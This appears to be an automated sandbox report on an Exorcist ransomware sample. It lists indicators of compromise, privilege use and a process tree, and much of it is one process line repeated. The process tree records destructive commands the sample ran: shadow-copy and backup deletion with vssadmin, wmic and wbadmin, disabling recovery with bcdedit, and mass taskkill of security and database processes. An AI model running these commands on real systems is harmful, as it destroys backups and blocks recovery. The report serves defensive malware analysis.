pid Process 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe 1456 79385ed97732aee0036e67824de18e28.exe -
NTFS ADS 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\boot.sys:adbpjrmig 79385ed97732aee0036e67824de18e28.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:lxqgwsimxzeqhnwaq 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:wrtonhzylpznh 79385ed97732aee0036e67824de18e28.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:adbpjrmig 79385ed97732aee0036e67824de18e28.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:lajwebwylzuwgkqu 79385ed97732aee0036e67824de18e28.exe -
Deletes itself 1 IoCs
pid Process 656 cmd.exe -
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1556 vssadmin.exe -
Suspicious use of AdjustPrivilegeToken 127 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 292 WMIC.exe Token: SeSecurityPrivilege 292 WMIC.exe Token: SeTakeOwnershipPrivilege 292 WMIC.exe Token: SeLoadDriverPrivilege 292 WMIC.exe Token: SeSystemProfilePrivilege 292 WMIC.exe Token: SeSystemtimePrivilege 292 WMIC.exe Token: SeProfSingleProcessPrivilege 292 WMIC.exe Token: SeIncBasePriorityPrivilege 292 WMIC.exe Token: SeCreatePagefilePrivilege 292 WMIC.exe Token: SeBackupPrivilege 292 WMIC.exe Token: SeRestorePrivilege 292 WMIC.exe Token: SeShutdownPrivilege 292 WMIC.exe Token: SeDebugPrivilege 292 WMIC.exe Token: SeSystemEnvironmentPrivilege 292 WMIC.exe Token: SeRemoteShutdownPrivilege 292 WMIC.exe Token: SeUndockPrivilege 292 WMIC.exe Token: SeManageVolumePrivilege 292 WMIC.exe Token: 33 292 WMIC.exe Token: 34 292 WMIC.exe Token: 35 292 WMIC.exe Token: SeIncreaseQuotaPrivilege 292 WMIC.exe Token: SeSecurityPrivilege 292 WMIC.exe Token: SeTakeOwnershipPrivilege 292 WMIC.exe Token: SeLoadDriverPrivilege 292 WMIC.exe Token: SeSystemProfilePrivilege 292 WMIC.exe Token: SeSystemtimePrivilege 292 WMIC.exe Token: SeProfSingleProcessPrivilege 292 WMIC.exe Token: SeIncBasePriorityPrivilege 292 WMIC.exe Token: SeCreatePagefilePrivilege 292 WMIC.exe Token: SeBackupPrivilege 292 WMIC.exe Token: SeRestorePrivilege 292 WMIC.exe Token: SeShutdownPrivilege 292 WMIC.exe Token: SeDebugPrivilege 292 WMIC.exe Token: SeSystemEnvironmentPrivilege 292 WMIC.exe Token: SeRemoteShutdownPrivilege 292 WMIC.exe Token: SeUndockPrivilege 292 WMIC.exe Token: SeManageVolumePrivilege 292 WMIC.exe Token: 33 292 WMIC.exe Token: 34 292 WMIC.exe Token: 35 292 WMIC.exe Token: SeBackupPrivilege 1500 vssvc.exe Token: SeRestorePrivilege 1500 vssvc.exe Token: SeAuditPrivilege 1500 vssvc.exe Token: SeDebugPrivilege 1924 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 1892 taskkill.exe Token: SeDebugPrivilege 884 taskkill.exe Token: SeDebugPrivilege 788 taskkill.exe Token: SeDebugPrivilege 1604 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 1596 taskkill.exe Token: SeDebugPrivilege 1880 taskkill.exe Token: SeDebugPrivilege 1920 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 480 taskkill.exe Token: SeDebugPrivilege 1604 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 1596 taskkill.exe Token: SeDebugPrivilege 1552 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 1112 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 1032 taskkill.exe Token: SeDebugPrivilege 1804 taskkill.exe Token: SeDebugPrivilege 1232 taskkill.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 672 taskkill.exe Token: SeDebugPrivilege 1908 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1316 taskkill.exe Token: SeDebugPrivilege 1268 taskkill.exe Token: SeDebugPrivilege 884 taskkill.exe Token: SeDebugPrivilege 788 taskkill.exe Token: SeDebugPrivilege 1788 taskkill.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 1168 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1316 taskkill.exe Token: SeDebugPrivilege 1268 taskkill.exe Token: SeDebugPrivilege 884 taskkill.exe Token: SeDebugPrivilege 1628 taskkill.exe Token: SeDebugPrivilege 1784 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 1524 taskkill.exe Token: SeDebugPrivilege 1252 taskkill.exe Token: SeDebugPrivilege 1872 taskkill.exe Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 1392 taskkill.exe Token: SeDebugPrivilege 1036 taskkill.exe Token: SeDebugPrivilege 548 taskkill.exe Token: SeDebugPrivilege 1360 taskkill.exe Token: SeDebugPrivilege 672 taskkill.exe Token: SeDebugPrivilege 1580 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 512 taskkill.exe Token: SeDebugPrivilege 1404 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 380 taskkill.exe Token: SeDebugPrivilege 804 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 1528 taskkill.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeDebugPrivilege 1916 taskkill.exe Token: SeDebugPrivilege 980 taskkill.exe Token: SeDebugPrivilege 2024 taskkill.exe Token: SeDebugPrivilege 272 taskkill.exe Token: SeDebugPrivilege 608 taskkill.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1236 taskkill.exe Token: SeDebugPrivilege 1800 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 468 taskkill.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 1804 taskkill.exe Token: SeDebugPrivilege 740 taskkill.exe Token: SeDebugPrivilege 1356 taskkill.exe Token: SeDebugPrivilege 1556 taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\79385ed97732aee0036e67824de18e28.exe"C:\Users\Admin\AppData\Local\Temp\79385ed97732aee0036e67824de18e28.exe"1⤵
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- NTFS ADS
PID:1456 -
C:\Windows\SysWOW64\cmd.execmd /C wmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic.exe SHADOWCOPY DELETE /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.execmd /C bcdedit.exe /set {default} recoveryenabled No2⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.execmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵PID:1784
-
-
C:\Windows\SysWOW64\cmd.execmd /C vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C C:\Windows\system32\vssvc.exe2⤵PID:1552
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wxServer*2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wxServer*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wxServerView*2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wxServerView*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlmangr*2⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlmangr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM RAgui*2⤵PID:1392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM RAgui*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM supervise*2⤵PID:1540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM supervise*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Culture*2⤵PID:304
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Culture*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Defwatch*2⤵PID:1360
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Defwatch*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM winword*2⤵PID:1768
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM winword*3⤵
